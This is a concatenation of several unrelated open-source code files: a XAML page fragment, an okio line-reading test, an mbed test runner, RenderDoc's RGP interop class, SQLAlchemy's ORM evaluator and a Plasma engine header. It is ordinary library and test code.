<SymbolIcon Symbol="Add"/>
<TextBlock Text="New alert"/>
</StackPanel>
</Button>
</StackPanel>
</Grid>
<!-- Camera control, builder wizard and result grid -->
<Grid x:Name="centralGrid" Grid.Column="1" VerticalAlignment="Stretch" HorizontalAlignment="Stretch">
<Grid.RowDefinitions>
<RowDefinition Height="7*" MinHeight="250"/>
<RowDefinition Height="3*"/>
<RowDefinition Height="200"/>
</Grid.RowDefinitions>
<Border x:Name="webCamHostGridParent" Grid.Row="0" Grid.RowSpan="2" HorizontalAlignment="Stretch" VerticalAlignment="Stretch">
<Grid x:Name="webCamHostGrid">
<ctl:CameraControl x:Name="cameraControl" FlowDirection="LeftToRight" ImageCaptured="OnCameraPhotoCaptured" ContinuousCaptured="OnCameraContinuousPhotoCaptured"/>
</Grid>
</Border>
<Grid Grid.Row="0" Grid.RowSpan="2" Name="cameraGuideCountdownHost" Visibility="Collapsed">
<Grid.RowDefinitions>
<RowDefinition Height="0.05*"/>
<RowDefinition/>
<RowDefinition Height="0.2*"/>
</Grid.RowDefinitions>
<Viewbox Grid.Row="1">
<TextBlock Name="countDownTextBlock" Foreground="White" FontWeight="Bold" Opacity="0.9"/>
</Viewbox>
</Grid>
<local:VisualAlertBuilderWizardControl Grid.Row="1" Grid.RowSpan="2" x:Name="visualAlertBuilderWizardControl" MinWidth="500"
WizardStepChanged="OnBuilderWizardControlStepChanged"
WizardCompleted="OnBuilderWizardControlCompleted"/>
<Grid x:Name="resultGrid" Grid.Row="2" Grid.RowSpan="1" Margin="0,26,0,0" MinWidth="500" VerticalAlignment="Top"
Visibility="{Binding ElementName=visualAlertBuilderWizardControl, Path=Visibility, Converter={StaticResource reverseVisibilityConverter}}">
<Grid.ColumnDefinitions>
<ColumnDefinition Width="Auto"/>
<ColumnDefinition Width="Auto"/>
<ColumnDefinition Width="*"/>
</Grid.ColumnDefinitions>
<StackPanel Orientation="Horizontal" Spacing="18" VerticalAlignment="Top">
<FontIcon x:Name="alertIcon" FontFamily="Segoe MDL2 Assets" Glyph="" FontSize="46" Visibility="Collapsed"/>
<TextBlock x:Name="alertTextBlock" Style="{StaticResource HeaderTextBlockStyle}" Foreground="White" VerticalAlignment="Center"/>
</StackPanel>
<TextBlock Grid.Column="1" x:Name="alertProbability" Style="{StaticResource SubheaderTextBlockStyle}" Margin="12,6,0,0"
VerticalAlignment="Center" Foreground="{StaticResource GrayColor}" Visibility="Collapsed"/>
<TextBlock Grid.Column="2" x:Name="fpsTextBlock" Style="{StaticResource SubheaderTextBlockStyle}"
HorizontalAlignment="Right" VerticalAlignment="Center" Foreground="{StaticResource GrayColor}"/>
</Grid>
</Grid>
</Grid>
<ProgressRing x:Name="progressRing" Grid.Row="1" Width="100" Height="100" Foreground="White"/>
</Grid>
</Page>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014 Square, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package okio;
import java.io.EOFException;
import java.io.IOException;
import java.util.Arrays;
import java.util.List;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import static kotlin.text.StringsKt.repeat;
import static okio.TestUtil.SEGMENT_SIZE;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
/**
 * Tests for {@code readUtf8Line}/{@code readUtf8LineStrict} across three source flavors:
 * a raw {@link Buffer}, a {@link RealBufferedSource}, and a "slow" buffered source whose
 * underlying stream yields at most one byte per read (exercising refill paths).
 */
@RunWith(Parameterized.class)
public final class ReadUtf8LineTest {
  /** Strategy for wrapping the test data in the source implementation under test. */
  private interface Factory {
    BufferedSource create(Buffer data);
  }
  @Parameterized.Parameters(name = "{0}")
  public static List<Object[]> parameters() {
    return Arrays.asList(
        new Object[] { new Factory() {
          @Override public BufferedSource create(Buffer data) {
            return data;
          }
          @Override public String toString() {
            return "Buffer";
          }
        }},
        new Object[] { new Factory() {
          @Override public BufferedSource create(Buffer data) {
            return new RealBufferedSource(data);
          }
          @Override public String toString() {
            return "RealBufferedSource";
          }
        }},
        new Object[] { new Factory() {
          @Override public BufferedSource create(Buffer data) {
            // Throttle the upstream to one byte per read so line scanning must
            // span many refills instead of seeing all bytes at once.
            return new RealBufferedSource(new ForwardingSource(data) {
              @Override public long read(Buffer sink, long byteCount) throws IOException {
                return super.read(sink, Math.min(1, byteCount));
              }
            });
          }
          @Override public String toString() {
            return "Slow RealBufferedSource";
          }
        }}
    );
  }
  @Parameterized.Parameter
  public Factory factory;
  // Backing data written by each test; `source` is the wrapped view under test.
  private Buffer data;
  private BufferedSource source;
  @Before public void setUp() {
    data = new Buffer();
    source = factory.create(data);
  }
  // Strict reads return each line without its terminator and throw EOF when exhausted.
  @Test public void readLines() throws IOException {
    data.writeUtf8("abc\ndef\n");
    assertEquals("abc", source.readUtf8LineStrict());
    assertEquals("def", source.readUtf8LineStrict());
    try {
      source.readUtf8LineStrict();
      fail();
    } catch (EOFException expected) {
      assertEquals("\\n not found: limit=0 content=…", expected.getMessage());
    }
  }
  // Lines of exactly `limit` bytes succeed around segment-size boundaries, for
  // both "\n" and "\r\n" terminators, with and without trailing data.
  @Test public void readUtf8LineStrictWithLimits() throws IOException {
    int[] lens = {1, SEGMENT_SIZE - 2, SEGMENT_SIZE - 1, SEGMENT_SIZE, SEGMENT_SIZE * 10};
    for (int len : lens) {
      data.writeUtf8(repeat("a", len)).writeUtf8("\n");
      assertEquals(len, source.readUtf8LineStrict(len).length());
      source.readUtf8();
      data.writeUtf8(repeat("a", len)).writeUtf8("\n").writeUtf8(repeat("a", len));
      assertEquals(len, source.readUtf8LineStrict(len).length());
      source.readUtf8();
      data.writeUtf8(repeat("a", len)).writeUtf8("\r\n");
      assertEquals(len, source.readUtf8LineStrict(len).length());
      source.readUtf8();
      data.writeUtf8(repeat("a", len)).writeUtf8("\r\n").writeUtf8(repeat("a", len));
      assertEquals(len, source.readUtf8LineStrict(len).length());
      source.readUtf8();
    }
  }
  // A failed limited read must leave the source untouched so a retry can succeed.
  @Test public void readUtf8LineStrictNoBytesConsumedOnFailure() throws IOException {
    data.writeUtf8("abc\n");
    try {
      source.readUtf8LineStrict(2);
      fail();
    } catch (EOFException expected) {
      assertTrue(expected.getMessage().startsWith("\\n not found: limit=2 content=61626"));
    }
    assertEquals("abc", source.readUtf8LineStrict(3));
  }
  @Test public void readUtf8LineStrictEmptyString() throws IOException {
    data.writeUtf8("\r\nabc");
    assertEquals("", source.readUtf8LineStrict(0));
    assertEquals("abc", source.readUtf8());
  }
  @Test public void readUtf8LineStrictNonPositive() throws IOException {
    data.writeUtf8("\r\n");
    try {
      source.readUtf8LineStrict(-1);
      fail("Expected failure: limit must be greater than 0");
    } catch (IllegalArgumentException expected) {
    }
  }
  // EOF messages include at most 32 bytes of hex content, then an ellipsis.
  @Test public void eofExceptionProvidesLimitedContent() throws IOException {
    data.writeUtf8("aaaaaaaabbbbbbbbccccccccdddddddde");
    try {
      source.readUtf8LineStrict();
      fail();
    } catch (EOFException expected) {
      assertEquals("\\n not found: limit=33 content=616161616161616162626262626262626363636363636363"
          + "6464646464646464…", expected.getMessage());
    }
  }
  // A bare trailing "\r" is NOT a line terminator for the strict variants.
  @Test public void newlineAtEnd() throws IOException {
    data.writeUtf8("abc\n");
    assertEquals("abc", source.readUtf8LineStrict(3));
    assertTrue(source.exhausted());
    data.writeUtf8("abc\r\n");
    assertEquals("abc", source.readUtf8LineStrict(3));
    assertTrue(source.exhausted());
    data.writeUtf8("abc\r");
    try {
      source.readUtf8LineStrict(3);
      fail();
    } catch (EOFException expected) {
      assertEquals("\\n not found: limit=3 content=6162630d…", expected.getMessage());
    }
    source.readUtf8();
    data.writeUtf8("abc");
    try {
      source.readUtf8LineStrict(3);
      fail();
    } catch (EOFException expected) {
      assertEquals("\\n not found: limit=3 content=616263…", expected.getMessage());
    }
  }
  @Test public void emptyLines() throws IOException {
    data.writeUtf8("\n\n\n");
    assertEquals("", source.readUtf8LineStrict());
    assertEquals("", source.readUtf8LineStrict());
    assertEquals("", source.readUtf8LineStrict());
    assertTrue(source.exhausted());
  }
  // "\r" is only stripped when immediately followed by "\n"; a lone "\r" stays in the line.
  @Test public void crDroppedPrecedingLf() throws IOException {
    data.writeUtf8("abc\r\ndef\r\nghi\rjkl\r\n");
    assertEquals("abc", source.readUtf8LineStrict());
    assertEquals("def", source.readUtf8LineStrict());
    assertEquals("ghi\rjkl", source.readUtf8LineStrict());
  }
  // Non-strict readUtf8Line mirrors BufferedReader: null at EOF instead of throwing.
  @Test public void bufferedReaderCompatible() throws IOException {
    data.writeUtf8("abc\ndef");
    assertEquals("abc", source.readUtf8Line());
    assertEquals("def", source.readUtf8Line());
    assertEquals(null, source.readUtf8Line());
  }
  @Test public void bufferedReaderCompatibleWithTrailingNewline() throws IOException {
    data.writeUtf8("abc\ndef\n");
    assertEquals("abc", source.readUtf8Line());
    assertEquals("def", source.readUtf8Line());
    assertEquals(null, source.readUtf8Line());
  }
}
| {
"pile_set_name": "Github"
} |
#include "CommandLineTestRunner.h"
#include <stdio.h>
#include "mbed.h"
#include "testrunner.h"
#include "test_env.h"
/**
Object 'mbed_cpputest_console' is used to show prints on console.
It is declared in \cpputest\src\Platforms\armcc\UtestPlatform.cpp
*/
Serial mbed_cpputest_console(STDIO_UART_TX, STDIO_UART_RX);
/**
 * Entry point for the on-target CppUTest runner wrapped in an mbed host test.
 *
 * Returns the number of failing tests (0 == success), and also reports the
 * PASS/FAIL verdict to the host via MBED_HOSTTEST_RESULT.
 */
int main(int ac, char** av) {
    MBED_HOSTTEST_TIMEOUT(20);
    MBED_HOSTTEST_SELECT(default_auto);
    MBED_HOSTTEST_DESCRIPTION(Unit test);
    MBED_HOSTTEST_START("UT");

    // Some embedded toolchains do not supply argc/argv, so the real command
    // line is ignored and a fixed argument vector is used instead. Marking the
    // parameters as used avoids -Wunused-parameter noise.
    (void)ac;
    (void)av;

    unsigned failureCount = 0;
    {
        // Distinct names (instead of shadowing ac/av) keep -Wshadow clean.
        int testArgc = 2;
        char* testArgv[] = {__FILE__, "-v"};  // "-v": verbose test output
        failureCount = CommandLineTestRunner::RunAllTests(testArgc, testArgv);
    }

    MBED_HOSTTEST_RESULT(failureCount == 0);
    return failureCount;
}
| {
"pile_set_name": "Github"
} |
/******************************************************************************
* The MIT License (MIT)
*
* Copyright (c) 2019-2020 Baldur Karlsson
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
******************************************************************************/
#include "RGPInterop.h"
#include <QApplication>
#include <QTcpServer>
#include <QTcpSocket>
// Returns true if the RGP executable at RGPPath supports interop, i.e. is
// version 1.2 or newer. The version is discovered by scanning the binary for
// an embedded "RGPVersion=X.Y" marker string.
bool RGPInterop::RGPSupportsInterop(const QString &RGPPath)
{
  uint32_t majorVersion = 0;
  uint32_t minorVersion = 0;

  const char *searchString = "RGPVersion=";
  const int searchStringLength = (int)strlen(searchString);

  // look for an embedded string in the exe
  QFile f(RGPPath);
  if(f.open(QIODevice::ReadOnly))
  {
    QByteArray contents = f.readAll();

    int search = 0;

    do
    {
      // use the named marker rather than duplicating the literal, so the
      // string and searchStringLength can never drift apart
      int needle = contents.indexOf(searchString, search);

      if(needle == -1)
        break;

      search = needle + searchStringLength;

      // bail if there isn't enough room for the string plus X.Y
      if(contents.size() - needle < searchStringLength + 3)
        break;

      // get the major version number
      const char *major = contents.data() + search;
      const char *sep = major;

      // find the separator
      while(*sep >= '0' && *sep <= '9')
        sep++;

      // get the minor version number
      const char *minor = sep + 1;
      const char *end = minor;

      // find the end
      while(*end >= '0' && *end <= '9')
        end++;

      // convert the strings to integers
      QByteArray majorStr(major, sep - major);
      QByteArray minorStr(minor, end - minor);

      bool ok = false;
      majorVersion = majorStr.toUInt(&ok);

      if(!ok)
      {
        majorVersion = 0;
        continue;
      }

      minorVersion = minorStr.toUInt(&ok);

      if(!ok)
      {
        majorVersion = minorVersion = 0;
        continue;
      }

      // found the version
      break;
    } while(search >= 0);
  }

  // interop supported in RGP V1.2 and higher
  if(majorVersion > 1 || (majorVersion == 1 && minorVersion > 1))
  {
    return true;
  }

  return false;
}
// Maps each RGPCommand enum value to the wire-protocol command name used in
// the text commands exchanged with RGP (see EncodeCommand / DecodeCommand).
template <>
rdcstr DoStringise(const RGPCommand &el)
{
  BEGIN_ENUM_STRINGISE(RGPCommand);
  {
    STRINGISE_ENUM_CLASS_NAMED(Initialize, "initialize");
    STRINGISE_ENUM_CLASS_NAMED(SetEvent, "set_event");
    STRINGISE_ENUM_CLASS_NAMED(Terminate, "terminate");
  }
  END_ENUM_STRINGISE();
}
// Starts listening for an incoming connection from RGP on the fixed interop
// port. Only one peer is serviced at a time; extra connections are refused.
RGPInterop::RGPInterop(ICaptureContext &ctx) : m_Ctx(ctx)
{
  m_Server = new QTcpServer(NULL);
  m_Server->listen(QHostAddress::Any, Port);

  QObject::connect(m_Server, &QTcpServer::newConnection, [this]() {
    if(m_Socket == NULL)
    {
      // first connection wins: adopt it and begin the handshake
      m_Socket = m_Server->nextPendingConnection();

      ConnectionEstablished();
    }
    else
    {
      // close any other connections while we already have one
      delete m_Server->nextPendingConnection();
    }
  });
}
// Sends a terminate command to RGP (if still connected) so it knows we are
// going away, then tears down the listening server.
RGPInterop::~RGPInterop()
{
  RGPInteropTerminate terminate;

  QString encoded = EncodeCommand(RGPCommand::Terminate, terminate.toParams(m_Version));

  if(m_Socket)
  {
    m_Socket->write(encoded.trimmed().toUtf8().data());
    // block until the terminate command is flushed, since we're destructing
    m_Socket->waitForBytesWritten();
  }

  m_Server->close();
  delete m_Server;
}
// First command of the handshake: announce our interop version and tool name
// to the connected RGP instance.
void RGPInterop::InitializeRGP()
{
  RGPInteropInit init;

  init.interop_version = 1;
  init.interop_name = lit("RenderDoc");

  QString encoded = EncodeCommand(RGPCommand::Initialize, init.toParams(m_Version));

  if(m_Socket)
  {
    m_Socket->write(encoded.trimmed().toUtf8().data());
  }
}
// Returns true when eventId can be selected in RGP: the handshake completed
// (non-zero protocol version), a peer is connected, and the event mapped to a
// non-zero RGP linear id.
bool RGPInterop::HasRGPEvent(uint32_t eventId)
{
  if(m_Version == 0 || m_Socket == NULL)
    return false;

  return m_Event2RGP[eventId].interoplinearid != 0;
}
// Asks RGP to select the profile event corresponding to our eventId.
// Returns true only if the set_event command was actually written.
bool RGPInterop::SelectRGPEvent(uint32_t eventId)
{
  // no negotiated protocol version means no connection was established
  if(m_Version == 0)
    return false;

  RGPInteropEvent ev = m_Event2RGP[eventId];

  // linear id 0 marks an event with no RGP counterpart
  if(ev.interoplinearid == 0)
    return false;

  QString encoded = EncodeCommand(RGPCommand::SetEvent, ev.toParams(m_Version));

  if(m_Socket == NULL)
    return false;

  m_Socket->write(encoded.trimmed().toUtf8().data());
  return true;
}
// Handles a set_event command from RGP: maps its linear id back to our
// eventId, selects that event in the UI and raises the main window.
void RGPInterop::EventSelected(RGPInteropEvent event)
{
  uint32_t eventId = m_RGP2Event[event.interoplinearid];

  // slot 0 / missing entries mean the id didn't come from our mapping
  if(eventId == 0)
  {
    qWarning() << "RGP Event " << event.interoplinearid << event.cmdbufid << event.eventname
               << " did not correspond to a known eventId";
    return;
  }

  // sanity check: the mapped drawcall should still carry the name RGP sent
  const DrawcallDescription *draw = m_Ctx.GetDrawcall(eventId);

  if(draw && QString(draw->name) != event.eventname)
    qWarning() << "Drawcall name mismatch. Expected " << event.eventname << " but got "
               << QString(draw->name);

  m_Ctx.SetEventID({}, eventId, eventId);

  BringToForeground(m_Ctx.GetMainWindow()->Widget());
}
// Called once when RGP connects: wires up socket lifetime handling, performs
// the handshake, builds the event mapping and installs the read handler.
void RGPInterop::ConnectionEstablished()
{
  QObject::connect(m_Socket, &QAbstractSocket::disconnected, [this]() {
    // schedule deletion and clear our pointer once the peer goes away
    m_Socket->deleteLater();
    m_Socket = NULL;
  });

  // initial handshake and protocol version
  InitializeRGP();

  // TODO: negotiate mapping version
  uint32_t version = 1;

  // build the eventId <-> RGP linear id tables for this mapping version
  CreateMapping(version);

  // add a handler that appends all data to the read buffer and processes each time more comes in.
  QObject::connect(m_Socket, &QIODevice::readyRead, [this]() {
    // append all available data
    m_ReadBuffer += m_Socket->readAll();

    // process the read buffer
    ProcessReadBuffer();
  });
}
// Recursively walks the drawcall tree in linear order, assigning consecutive
// RGP linear ids to every event whose chunk name appears in m_EventNames,
// and filling both the forward (m_Event2RGP) and reverse (m_RGP2Event) maps.
void RGPInterop::CreateMapping(const rdcarray<DrawcallDescription> &drawcalls)
{
  const SDFile &file = m_Ctx.GetStructuredFile();

  for(const DrawcallDescription &draw : drawcalls)
  {
    for(const APIEvent &ev : draw.events)
    {
      // skip events with no valid structured-data chunk
      if(ev.chunkIndex == 0 || ev.chunkIndex >= file.chunks.size())
        continue;

      const SDChunk *chunk = file.chunks[ev.chunkIndex];

      if(m_EventNames.contains(chunk->name, Qt::CaseSensitive))
      {
        // the next free linear id is the current size of the reverse table
        m_Event2RGP[ev.eventId].interoplinearid = (uint32_t)m_RGP2Event.size();
        // prefer the drawcall's own name for the drawcall's event itself
        if(ev.eventId == draw.eventId)
          m_Event2RGP[ev.eventId].eventname = draw.name;
        else
          m_Event2RGP[ev.eventId].eventname = chunk->name;

        m_RGP2Event.push_back(ev.eventId);
      }
    }

    // if we have children, step into them first before going to our next sibling
    if(!draw.children.empty())
      CreateMapping(draw.children);
  }
}
// Selects the set of API call names RGP can map for the current API and the
// given interop mapping version, then builds the event id tables.
void RGPInterop::CreateMapping(uint32_t version)
{
  m_Version = version;

  if(m_Ctx.APIProps().pipelineType == GraphicsAPI::Vulkan)
  {
    if(version == 1)
    {
      m_EventNames << lit("vkCmdDispatch") << lit("vkCmdDraw") << lit("vkCmdDrawIndexed");
    }
  }
  else if(m_Ctx.APIProps().pipelineType == GraphicsAPI::D3D12)
  {
    // these names must match those in DoStringise(const D3D12Chunk &el) for the chunks
    if(version == 1)
    {
      m_EventNames << lit("ID3D12GraphicsCommandList::Dispatch")
                   << lit("ID3D12GraphicsCommandList::DrawInstanced")
                   << lit("ID3D12GraphicsCommandList::DrawIndexedInstanced");
    }
  }

  // if we don't have any event names, this API doesn't have a mapping or this was an unrecognised
  // version.
  if(m_EventNames.isEmpty())
    return;

  // one forward-table slot per eventId up to the last drawcall's event
  m_Event2RGP.resize(m_Ctx.GetLastDrawcall()->eventId + 1);

  // linearId 0 is invalid, so map to eventId 0.
  // the first real event will be linearId 1
  m_RGP2Event.push_back(0);

  CreateMapping(m_Ctx.CurDrawcalls());
}
// Serialises a command as plain text: a "command=<name>" header, one
// "<name>.<key>=<value>" line per key/value pair in params, then an
// "endcommand=<name>" trailer.
QString RGPInterop::EncodeCommand(RGPCommand command, QVariantList params)
{
  const QString cmd = ToQStr(command);

  QString ret = lit("command=%1\n").arg(cmd);

  // params alternates key, value - consume one pair per iteration
  int i = 0;
  while(i + 1 < params.count())
  {
    ret += QFormatStr("%1.%2=%3\n").arg(cmd).arg(params[i].toString()).arg(params[i + 1].toString());
    i += 2;
  }

  ret += lit("endcommand=%1\n").arg(cmd);

  return ret;
}
// Parses one complete "command=<name> ... endcommand=<name>" text command,
// validates its framing, decodes the "<name>.<key>=<value>" parameter lines
// and dispatches to the matching handler. Returns true if handled.
bool RGPInterop::DecodeCommand(QString command)
{
  QStringList lines = command.trimmed().split(QLatin1Char('\n'));

  if(lines[0].indexOf(lit("command=")) != 0 || lines.last().indexOf(lit("endcommand=")) != 0)
  {
    qWarning() << "Malformed RGP command:\n" << command;
    return false;
  }

  QString commandName = lines[0].split(QLatin1Char('='))[1];

  // header and trailer must name the same command
  if(lines.last().split(QLatin1Char('='))[1] != commandName)
  {
    qWarning() << "Mismatch between command and endcommand:\n" << command;
    return false;
  }

  // strip the framing lines, leaving only the parameter lines
  lines.pop_front();
  lines.pop_back();

  QVariantList params;

  // every parameter key is prefixed with "<commandName>."
  QString prefix = commandName + lit(".");

  for(QString &param : lines)
  {
    int eq = param.indexOf(QLatin1Char('='));

    if(eq < 0)
    {
      qWarning() << "Malformed param: " << param;
      continue;
    }

    QString key = param.left(eq);
    QString value = param.mid(eq + 1);

    if(!key.startsWith(prefix))
    {
      qWarning() << "Malformed param key for" << commandName << ": " << key;
      continue;
    }

    key = key.mid(prefix.count());

    // params alternates key, value - consumed by the fromParams() helpers
    params << key << value;
  }

  if(commandName == ToQStr(RGPCommand::SetEvent))
  {
    RGPInteropEvent ev;
    ev.fromParams(m_Version, params);

    EventSelected(ev);

    return true;
  }
  else if(commandName == ToQStr(RGPCommand::Initialize))
  {
    RGPInteropInit init;
    init.fromParams(m_Version, params);

    // TODO: decode the params here. This will contain the interop
    // version and the name of the tool connected to RenderDoc

    return true;
  }
  else if(commandName == ToQStr(RGPCommand::Terminate))
  {
    // RGP has shut down so disconnect the socket etc
    emit m_Socket->disconnected();

    return true;
  }
  else
  {
    qWarning() << "Unrecognised command: " << commandName;
  }

  return false;
}
// Pulls any complete commands out of m_ReadBuffer and decodes them, leaving
// partial trailing data in the buffer for the next readyRead.
void RGPInterop::ProcessReadBuffer()
{
  // we might have partial data, so wait until we have a full command
  do
  {
    int idx = m_ReadBuffer.indexOf("endcommand=");

    // if we don't have endcommand= yet, we don't have a full command
    if(idx < 0)
      return;

    idx = m_ReadBuffer.indexOf('\n', idx);

    // also break if we don't have the full line yet including newline.
    if(idx < 0)
      return;

    // extract the command and decode as UTF-8
    QString command = QString::fromUtf8(m_ReadBuffer.data(), idx + 1);

    // remove the command from our buffer, to retain any partial subsequent command we might have
    m_ReadBuffer.remove(0, idx + 1);

    // process this command
    DecodeCommand(command);

    // loop again - we might have read multiple commands
  } while(true);
}
| {
"pile_set_name": "Github"
} |
# orm/evaluator.py
# Copyright (C) 2005-2019 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import operator
from .. import inspect
from .. import util
from ..sql import operators
class UnevaluatableError(Exception):
    """Raised when a SQL clause cannot be compiled into a plain Python
    function for in-memory evaluation against object instances."""

    pass
# Binary operators that map directly to Python-level callables; each name is
# looked up on sqlalchemy.sql.operators and invoked as-is on the evaluated
# operand values (see EvaluatorCompiler.visit_binary).
_straight_ops = set(
    getattr(operators, op)
    for op in (
        "add",
        "mul",
        "sub",
        "div",
        "mod",
        "truediv",
        "lt",
        "le",
        "ne",
        "gt",
        "ge",
        "eq",
    )
)

# Operators with no Python-side implementation here. NOTE(review): this set
# is not referenced anywhere in this chunk - presumably consulted elsewhere;
# confirm before removing.
_notimplemented_ops = set(
    getattr(operators, op)
    for op in (
        "like_op",
        "notlike_op",
        "ilike_op",
        "notilike_op",
        "between_op",
        "in_op",
        "notin_op",
        "endswith_op",
        "concat_op",
    )
)
class EvaluatorCompiler(object):
    """Compile SQL expression clauses into plain Python functions.

    Each ``visit_*`` method returns a callable ``obj -> value`` that
    evaluates the same criteria the SQL expression would, against a mapped
    object's loaded attributes.  SQL NULL is modeled as ``None``, including
    SQL's three-valued logic in AND/OR and in binary operators.

    Clauses that cannot be mirrored in Python raise
    :class:`.UnevaluatableError`.
    """

    def __init__(self, target_cls=None):
        # target_cls: the mapped class the produced evaluators will run
        # against; used to validate column expressions, may be None.
        self.target_cls = target_cls

    def process(self, clause):
        """Dispatch ``clause`` to its ``visit_<visit_name>`` method."""
        meth = getattr(self, "visit_%s" % clause.__visit_name__, None)
        if not meth:
            raise UnevaluatableError(
                "Cannot evaluate %s" % type(clause).__name__
            )
        return meth(clause)

    def visit_grouping(self, clause):
        # parenthesization has no effect on Python-side evaluation
        return self.process(clause.element)

    def visit_null(self, clause):
        # SQL NULL -> None
        return lambda obj: None

    def visit_false(self, clause):
        return lambda obj: False

    def visit_true(self, clause):
        return lambda obj: True

    def visit_column(self, clause):
        """Return an evaluator reading the mapped attribute for a column."""
        if "parentmapper" in clause._annotations:
            parentmapper = clause._annotations["parentmapper"]
            if self.target_cls and not issubclass(
                self.target_cls, parentmapper.class_
            ):
                raise UnevaluatableError(
                    "Can't evaluate criteria against alternate class %s"
                    % parentmapper.class_
                )
            key = parentmapper._columntoproperty[clause].key
        else:
            # non-annotated column: only usable if its key happens to match
            # a mapped column attribute on the target class (deprecated)
            key = clause.key
            if (
                self.target_cls
                and key in inspect(self.target_cls).column_attrs
            ):
                util.warn(
                    "Evaluating non-mapped column expression '%s' onto "
                    "ORM instances; this is a deprecated use case. Please "
                    "make use of the actual mapped columns in ORM-evaluated "
                    "UPDATE / DELETE expressions." % clause
                )
            else:
                raise UnevaluatableError("Cannot evaluate column: %s" % clause)

        get_corresponding_attr = operator.attrgetter(key)
        return lambda obj: get_corresponding_attr(obj)

    def visit_clauselist(self, clause):
        """Evaluate AND/OR lists with SQL three-valued (NULL-aware) logic."""
        evaluators = list(map(self.process, clause.clauses))
        if clause.operator is operators.or_:

            def evaluate(obj):
                # OR: True wins outright; otherwise NULL poisons the result
                has_null = False
                for sub_evaluate in evaluators:
                    value = sub_evaluate(obj)
                    if value:
                        return True
                    has_null = has_null or value is None
                if has_null:
                    return None
                return False

        elif clause.operator is operators.and_:

            def evaluate(obj):
                # AND: NULL short-circuits to None, falsehood to False
                for sub_evaluate in evaluators:
                    value = sub_evaluate(obj)
                    if not value:
                        if value is None:
                            return None
                        return False
                return True

        else:
            raise UnevaluatableError(
                "Cannot evaluate clauselist with operator %s" % clause.operator
            )

        return evaluate

    def visit_binary(self, clause):
        """Evaluate binary expressions; a NULL operand yields ``None``."""
        eval_left, eval_right = list(
            map(self.process, [clause.left, clause.right])
        )
        operator = clause.operator
        if operator is operators.is_:

            def evaluate(obj):
                return eval_left(obj) == eval_right(obj)

        elif operator is operators.isnot:

            def evaluate(obj):
                return eval_left(obj) != eval_right(obj)

        elif operator in _straight_ops:

            def evaluate(obj):
                left_val = eval_left(obj)
                right_val = eval_right(obj)
                if left_val is None or right_val is None:
                    return None
                # reuse the values computed above; re-invoking the
                # sub-evaluators here would evaluate each operand twice
                return operator(left_val, right_val)

        else:
            raise UnevaluatableError(
                "Cannot evaluate %s with operator %s"
                % (type(clause).__name__, clause.operator)
            )

        return evaluate

    def visit_unary(self, clause):
        """Evaluate NOT; NULL propagates as ``None``."""
        eval_inner = self.process(clause.element)
        if clause.operator is operators.inv:

            def evaluate(obj):
                value = eval_inner(obj)
                if value is None:
                    return None
                return not value

            return evaluate
        raise UnevaluatableError(
            "Cannot evaluate %s with operator %s"
            % (type(clause).__name__, clause.operator)
        )

    def visit_bindparam(self, clause):
        """Return an evaluator producing the bind parameter's value."""
        if clause.callable:
            val = clause.callable()
        else:
            val = clause.value
        return lambda obj: val
| {
"pile_set_name": "Github"
} |
/*==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email [email protected]
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==*/
#include "HeadSpin.h"
#include "hsResMgr.h"
#include "plComponentReg.h"
#include "plActivatorBaseComponent.h"
#include "plResponderComponent.h"
#include "MaxMain/plMaxNode.h"
#include "resource.h"
#pragma hdrstop
#include "plClickableComponent.h"
#include "pnSceneObject/plSceneObject.h"
